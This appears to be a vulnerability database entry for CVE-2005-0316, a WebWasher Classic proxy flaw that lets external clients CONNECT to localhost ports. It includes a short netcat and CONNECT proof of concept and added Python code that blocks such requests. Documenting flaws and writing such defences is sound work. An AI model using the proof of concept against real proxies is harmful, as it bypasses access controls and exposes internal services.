WebWasher Classic Security Restriction Bypass Vulnerability


Vulnerability ID 1108423 Vulnerability type Design error
Published 2005-01-28 Updated 2005-10-20
CVE ID CVE-2005-0316
CNNVD-ID CNNVD-200501-317
Platform Multiple CVSS score 7.5
|Vulnerability source
https://www.exploit-db.com/exploits/25066
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200501-317
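|Vulnerability details
WebWasher Classic is software for filtering web pages. WebWasher Classic versions 2.2.1 and 3.3 contain an access-control bypass vulnerability. When running in server mode, these versions do not correctly handle CONNECT requests to localhost that come from external systems, which allows remote attackers to bypass access restrictions.
|Exploit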
source: http://www.securityfocus.com/bid/12394/info

It is reported that WebWasher Classic is prone to a weakness that may allow remote attackers to connect to arbitrary ports on a vulnerable computer.

This weakness may be combined with other attacks to exploit latent vulnerabilities. An attacker can bypass access controls implemented by the application through this attack.

WebWasher Classic 3.3 and 2.2.1 are reported prone to this weakness. Other versions may be affected as well. 

The following proof of concept is available:
1) Start a netcat listener on the WebWasher system:
netcat -L -p 99 -s 127.0.0.1 < hallo.txt
2) Connect to the WebWasher proxy port (default 8080/tcp)
3) Enter command "CONNECT 127.0.0.1:99 HTTP/1.0"

As a result, content of hallo.txt will appear.
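
A destination check that a proxy could apply to CONNECT requests from external clients, so that a request such as the one in step 3 is refused. This is an added example, not code from the advisory or the vendor; the port allow-list, the function names and the `own_addresses` and `resolve` parameters are assumptions.

```python
import ipaddress
import socket

ALLOWED_CONNECT_PORTS = {443}  # assumption: CONNECT is only needed for HTTPS

def parse_connect(request_line):
    """Return (host, port) from 'CONNECT host:port HTTP/1.x', or None if malformed."""
    parts = request_line.split()
    if len(parts) != 3 or parts[0] != "CONNECT" or not parts[2].startswith("HTTP/"):
        return None
    host, sep, port = parts[1].rpartition(":")
    if not sep or not host or not port.isdecimal() or not 0 < int(port) < 65536:
        return None
    return host.strip("[]").lower(), int(port)  # brackets wrap IPv6 literals

def system_resolve(host):
    """Default resolver: every address the name maps to on this system."""
    return {info[4][0] for info in socket.getaddrinfo(host, None)}

def is_local(addr, own_addresses):
    """True if addr is loopback, unspecified, link-local, or one of the proxy's own."""
    ip = ipaddress.ip_address(addr)
    if ip.version == 6 and ip.ipv4_mapped:  # ::ffff:127.0.0.1 style literals
        ip = ip.ipv4_mapped
    return (ip.is_loopback or ip.is_unspecified or ip.is_link_local
            or str(ip) in own_addresses)

def connect_allowed(request_line, own_addresses=(), resolve=system_resolve):
    """Policy decision for a CONNECT request received from a non-local client."""
    target = parse_connect(request_line)
    if target is None:
        return False
    host, port = target
    if port not in ALLOWED_CONNECT_PORTS:
        return False
    try:
        addrs = {str(ipaddress.ip_address(host))}
    except ValueError:  # not an IP literal: check what the name resolves to
        try:
            addrs = resolve(host)
        except OSError:
            return False
    # Deny if ANY candidate address is local; the tunnel must then be opened
    # to one of these checked addresses, not re-resolved by name.
    return bool(addrs) and not any(is_local(a, own_addresses) for a in addrs)
```

Checking the resolved addresses, not the string in the request line, is what covers names and alternate spellings that point back at the proxy host.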
|References

Source: BID
Name: 12394
Link: http://www.securityfocus.com/bid/12394
Source: SECUNIA
Name: 14058
Link: http://secunia.com/advisories/14058
Source: XF
Name: webwasher-classic-connect-gain-access(19144)
Link: http://xforce.iss.net/xforce/xfdb/19144
Source: MISC
Link: http://www.oliverkarow.de/research/WebWasherCONNECT.txt
Source: BUGTRAQ
Name: 20050128 WebWasher Classic - HTTP CONNECT weakness
Link: http://marc.theaimsgroup.com/?l=bugtraq&m=110693045507245&w=2
Source: SECTRACK
Name: 1013036
Link: http://securitytracker.com/id?1013036
